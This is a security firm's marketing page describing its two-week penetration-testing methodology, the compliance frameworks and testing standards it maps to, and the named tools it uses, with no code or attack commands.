Valtik Studios
How We Work

Our methodology

Six phases. Two weeks. Every finding verified by hand. Here's exactly what happens when you engage Valtik Studios.

01
Day 1

Scope & Authorization

Day 1

We define exactly what gets tested, sign a permission letter, and set up secure communication channels. No scanning happens until authorization is confirmed.

Target domains & IP ranges
Signed permission letter on file
Emergency contact exchange
Secure reporting channel setup
02
Days 1-2

Reconnaissance

Days 1-2

Passive and active recon to map your attack surface. Subdomain enumeration, service fingerprinting, technology stack identification, and exposed asset discovery.

DNS & subdomain enumeration
Certificate transparency logs
Technology stack fingerprinting
Exposed service inventory
03
Days 2-4

Automated Scanning

Days 2-4

Our 34 platform-specific scanners run against your stack. Each scanner is built from real vulnerability research, not generic CVE databases.

34 platform-specific scanners
BaaS misconfuration detection
Secret & credential scanning
Authentication flow analysis
04
Days 4-10

Manual Escalation

Days 4-10

Every automated finding is manually verified and escalated. We chain vulnerabilities together, test business logic, and look for the things scanners miss.

Finding verification & triage
Vulnerability chaining
Business logic testing
Privilege escalation attempts
05
Days 10-12

Reporting

Days 10-12

You receive two deliverables: a 1-page executive summary for leadership, and a full technical report with reproduction steps and fix commands.

Executive summary (1 page)
Technical report with repro steps
Severity-ranked findings
Remediation guidance per finding
06
Day 14 + 2 months

Walkthrough & Retest

Day 14 + 2 months

30-minute call walking through every finding. After you fix things, we retest for free within two months to confirm the fixes hold.

30-minute walkthrough call
Q&A on all findings
Free retest within 60 days
Public verification certificate

Ready to see this in action?

Request a Quote
Compliance Framework Mapping

Our methodology maps to the frameworks your auditors check

PCI DSS 4.0

Requirement 11.4

Our engagements satisfy Requirement 11.4.1 (industry-accepted methodology), 11.4.2 (external), 11.4.3 (internal), and 11.4.5/11.4.6 (segmentation testing). QSA-ready attestation letter included.

PCI DSS 4.0 Penetration Testing →
HIPAA Security Rule

45 CFR 164.308(a)(8)

Evaluation of security controls. Our engagements include risk analysis, technical safeguard review, and penetration testing of ePHI-handling systems. Aligned with the proposed 2024-2026 Security Rule update.

HIPAA Security Assessment →
SOC 2

Trust Services Criteria CC6, CC7

Findings map to Common Criteria CC6 (Logical and Physical Access) and CC7 (System Operations). Reports are structured to satisfy the documentation requirements that SOC 2 auditors apply during Type II review.

SOC 2 Readiness →
CMMC 2.0

NIST 800-171 CA.L2-3.12.1

Security assessments of CUI-handling systems. Readiness-only (we are not a C3PAO). Our work prepares you for the formal assessment.

CMMC 2.0 Readiness →
NYDFS 23 NYCRR 500

Section 500.05

Annual penetration testing and bi-annual vulnerability assessments. Reports suitable for NYDFS examiner review and the annual certification of compliance.

NYDFS Deep Dive →
ISO 27001:2022

Annex A.8.8, A.5.23, A.5.25

Vulnerability management, information security for cloud services, and technical compliance reviews. Dual certification path alongside SOC 2.

ISO 27001 vs SOC 2 →
Standards Alignment

Built on recognized testing standards

NIST SP 800-115

Technical Guide to Information Security Testing and Assessment. The foundational US government guidance for penetration testing. Defines planning, discovery, attack, and reporting phases. Every engagement is documented against this reference.

OWASP Testing Guide v4.2

Web application testing methodology covering authentication, session management, input validation, business logic, client-side, and API testing. Primary reference for application security work.

OWASP API Security Top 10 (2023)

Current API-specific vulnerability categories including broken object-level authorization (BOLA), broken function-level authorization, improper inventory, and unsafe consumption of APIs.

PTES (Penetration Testing Execution Standard)

Seven-phase methodology: pre-engagement, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting. Referenced in PCI DSS 4.0 Requirement 11.4.1 as an accepted approach.

MITRE ATT&CK

Adversary tactics, techniques, and procedures framework. Attack chains are documented against ATT&CK technique IDs so findings translate directly to detection engineering and threat hunting.

CIS Critical Security Controls

18 prioritized controls referenced in our remediation recommendations. Findings are mapped to the CIS Control they address so remediation fits into broader security program planning.

Tooling

Commercial, open source, and Valtik-built

We use industry-standard tools, not a single vendor's stack. Transparency matters — here is what actually runs during engagements.

Commercial

  • Burp Suite Professional
  • Commercial vulnerability scanners as required per engagement
  • Cloud-provider native security tooling (AWS Inspector, Azure Defender, GCP SCC)

Open Source

  • Nuclei, Nmap, FFuF
  • OWASP ZAP, sqlmap
  • Impacket, BloodHound
  • Trivy, Checkov, Semgrep
  • CrackMapExec, Responder

Valtik-built

  • 34+ platform-specific scanners
  • BaaS detection & exploitation
  • JWT secret crackers
  • Nuclei template library
  • Custom exploit modules

Ready to start?

Free website security check. No obligation, no sales pitch. We scan your public surface and send a plain-English findings report in 48 hours.

Request Free CheckSee Services